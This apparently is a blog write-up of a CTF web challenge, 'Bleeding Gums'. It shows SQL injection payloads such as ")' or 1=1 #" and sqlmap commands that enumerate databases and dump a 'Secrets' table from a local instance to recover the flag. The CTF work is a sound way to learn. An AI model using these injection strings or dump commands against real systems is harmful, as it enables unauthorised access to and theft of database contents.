2019 Stonecutters - Bleeding Gums

In honor of Bleeding Gums Murphy, who passed away 24 years ago today; I thought it would be nice to pay tribute to him by publishing my write-up for the Stonecutter's "Bleeding Gums"challenge.

RIP Bleeding Gums

Bleeding Gums was an empty website aside from a single search field as seen below:


index.php

When I searched for the letter "a", I saw the table below:

Search Results

When I searched for the letter "b", I saw a smaller data set returned and some of the artists were different.

Next, I searched for years and album titles but the query only seemed to search for Artists.
Searching for ' gave me the following SQL error:

Error: You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ')'' at line 1

I threw sqlmap at it but I wasn't able to get anything out of it. I then started to play with the injection manually.

With this particular challenge, I noticed that -- and # would cause the error messages to be different. For example, ' OR 1=1 -- would return blank page, but 'OR 1=1 # would give me this error:

Error: Got error 'missing ) at offset 4' from regexp

The injection was obviously missing a ) so I added it to various places in the query and played with the 1=1 test and I found that ")' or 1=1 # " would return the full table of Artists.
At this point I felt that it was worth trying sqlmap again. I always first confirm that sqlmap will work for my purposes by using the --current-user option as seen in my command below:

# sqlmap -u "http://127.0.0.1:8080/index.php" --data="a=)'*%20#%20" --current-user 

This was successful and returned the following information:

<snip>
[21:57:32] [INFO] the back-end DBMS is MySQL
web application technology: PHP 7.2.3
back-end DBMS: MySQL >= 5.0
[21:57:32] [INFO] fetching current user
current user:    'ctf@localhost'
[21:57:32] [INFO] fetched data logged to text files under '/root/.sqlmap/output/127.0.0.1'
<snip>


I next did a -a. No flag was discovered in this output, or I otherwise overlooked it, but I did notice another database called "ctf."  Using sqlmap, I stepped through identifying what databases existed and what tables they had.

First, I used --dbs to show me the available databases:

# sqlmap -u "http://127.0.0.1:8080/index.php" --data="a=)'*%20#%20" --dbs
<snip>
[*] ctf
[*] information_schema
[*] test
<snip>

The CTF database stuck out as this was after all, a CTF, so I then used SQLmap to dump the tables for that database:

# sqlmap -u "http://127.0.0.1:8080/index.php" --data="a=)'*%20#%20" --tables -D "ctf"
<snip>
Database: ctf
[2 tables]
+---------+
| Albums  |
| Secrets |
+---------+
<snip>

Secrets looked super interesting so I then dumped the table entries for the "Secrets" table:

# sqlmap -u "http://127.0.0.1:8080/index.php" --data="a=)'*%20#%20" -T "Secrets" --dump  

Which presented me with the flag:

Database: ctf
Table: Secrets
[1 entry]
+-------------------------------------+
| secret                              |
+-------------------------------------+
| flag{SelmaSmokesJazzCigarettes}     |
+-------------------------------------+

Another fun challenge SQli challenge. sqlmap is such a powerful tool, it's easy to throw it at something and expect magic to happen. That's not always the case so when you see errors - keep trying!

-strupo_

Popular posts from this blog

A Primer for On-Site CTFs

ArcticCon 2019 CTF

BHIS CTF@Shmoocon 2019 - Feeling Blue?